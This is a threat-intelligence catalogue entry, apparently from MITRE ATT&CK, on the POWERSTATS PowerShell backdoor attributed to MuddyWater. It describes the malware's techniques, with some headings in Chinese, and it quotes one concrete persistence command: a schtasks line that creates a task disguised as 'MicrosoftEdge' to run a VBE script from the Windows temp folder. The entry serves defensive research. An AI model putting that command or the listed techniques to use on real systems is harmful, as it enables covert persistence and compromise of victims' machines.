1. Home
  2. Software
  3. POWERSTATS

POWERSTATS

POWERSTATS is a PowerShell-based first stage backdoor used by MuddyWater. [1]

ID: S0223
Associated Software: Powermud
Type: MALWARE
Platforms: Windows
Version: 2.3
Created: 18 April 2018
Last Modified: 22 March 2023

Associated Software Descriptions

Name Description
Powermud

[2]
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1047 Windows管理规范

POWERSTATS can use WMI queries to retrieve data from compromised hosts.[3][4]
Enterprise T1005 从本地系统获取数据

POWERSTATS can upload files from compromised hosts.[3]
Enterprise T1090 .002 代理: External Proxy

POWERSTATS has connected to C2 servers through proxies.[3]
Enterprise T1036 .004 伪装: Masquerade Task or Service

POWERSTATS has created a scheduled task named "MicrosoftEdge" to establish persistence.[4]
Enterprise T1573 .002 加密通道: Asymmetric Cryptography

POWERSTATS has encrypted C2 traffic with RSA.[3]
Enterprise T1140 反混淆/解码文件或信息

POWERSTATS can deobfuscate the main backdoor code.[4]
Enterprise T1059 .001 命令与脚本解释器: PowerShell

POWERSTATS uses PowerShell for obfuscation and execution.[1][4][5][6]
.005 命令与脚本解释器: Visual Basic

POWERSTATS can use VBScript (VBE) code for execution.[4][5]
.007 命令与脚本解释器: JavaScript

POWERSTATS can use JavaScript code for execution.[4]
Enterprise T1562 .001 妨碍防御: Disable or Modify Tools

POWERSTATS can disable Microsoft Office Protected View by changing Registry keys.[3]
Enterprise T1113 屏幕捕获

POWERSTATS can retrieve screenshots from compromised hosts.[3][5]
Enterprise T1132 .001 数据编码: Standard Encoding

POWERSTATS encoded C2 traffic with base64.[1]
Enterprise T1027 .001 混淆文件或信息: Binary Padding

POWERSTATS has used useless code blocks to counter analysis.[5]
.010 混淆文件或信息: Command Obfuscation

POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob. [3][4] POWERSTATS has used PowerShell code with custom string obfuscation [5]
Enterprise T1070 .004 移除指标: File Deletion

POWERSTATS can delete all files on the C:\, D:\, E:\ and, F:\ drives using PowerShell Remove-Item commands.[3]
Enterprise T1218 .005 系统二进制代理执行: Mshta

POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.[3]
Enterprise T1082 系统信息发现

POWERSTATS can retrieve OS name/architecture and computer/domain name information from compromised hosts.[3][5]
Enterprise T1033 系统所有者/用户发现

POWERSTATS has the ability to identify the username on the compromised host.[5]
Enterprise T1016 系统网络配置发现

POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts.[3][5]
Enterprise T1087 .001 账号发现: Local Account

POWERSTATS can retrieve usernames from compromised hosts.[3]
Enterprise T1518 .001 软件发现: Security Software Discovery

POWERSTATS has detected security tools.[3]
Enterprise T1105 输入工具传输

POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.[3]
Enterprise T1057 进程发现

POWERSTATS has used get_tasklist to discover processes on the compromised host.[5]
Enterprise T1559 .001 进程间通信: Component Object Model

POWERSTATS can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.[3]
.002 进程间通信: Dynamic Data Exchange

POWERSTATS can use DDE to execute additional payloads on compromised hosts.[3]
Enterprise T1053 .005 预定任务/作业: Scheduled Task

POWERSTATS has established persistence through a scheduled task using the command "C:\Windows\system32\schtasks.exe" /Create /F /SC DAILY /ST 12:00 /TN MicrosoftEdge /TR "c:\Windows\system32\wscript.exe C:\Windows\temp\Windows.vbe".[4]
Enterprise T1029 预定传输

POWERSTATS can sleep for a given number of seconds.[3]

Groups That Use This Software

ID Name References
G0069 MuddyWater

[1][3][4][2][7]

References

  1. Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
  2. Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.
  3. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  4. ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
  1. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  2. FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
  3. ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.